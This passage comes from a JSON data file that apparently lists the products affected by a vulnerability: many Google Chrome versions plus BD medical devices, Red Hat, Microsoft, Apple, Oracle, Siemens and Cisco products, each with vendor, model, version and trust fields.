"model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.63" }, { "model": "pyxis medication administration", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.617.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.0" }, { "model": "enterprise linux for real time", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.312" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.699.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.961.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.202" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.341" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1058" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "56.0.2924.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.3" }, { "model": "facsverse", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1054" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.506.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.16" }, { "model": "kiestra tla/wca", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.703.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.744.0" }, { "model": "internet explorer", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.133" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1078.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.328.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.91" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.381.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1283.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.711.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.330" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.21" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.147" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.797.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.14443" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.521.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.46" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "pyxis cathrack", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.774.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.803.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.49" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.623.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.345.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.28" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.859.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1674.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.930.0" }, { "model": "pyxis specimen collection verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.50" }, { "model": "windows server r2 for x64-based systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.562.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "55.0.2883.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.798.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.227" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.59" }, { "model": "gencell clic", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.647.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.937.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.90" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.1" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.867.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.329" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.746.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.753.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.59" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1038.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.7" }, { "model": "bactec fx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.496.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.728.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.7" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.824.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.706.0" }, { "model": "lyse wash assistant", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.585.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.557.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.80" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.549.0" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.12.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.207" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.440.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.343.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1053.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.957.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.52" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.573.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1055" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.806.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.13" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.863.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.652.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.29" }, { "model": "simatic ipc227e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.33" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.13.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.952.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1019" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.872.0" }, { "model": "simatic hmi comfort pro panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1022.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "enterprise linux for ibm z systems", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.341.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.11" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.223" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1657.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1273.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.46" }, { "model": "rowa vmax system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1274.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1015" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.714.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 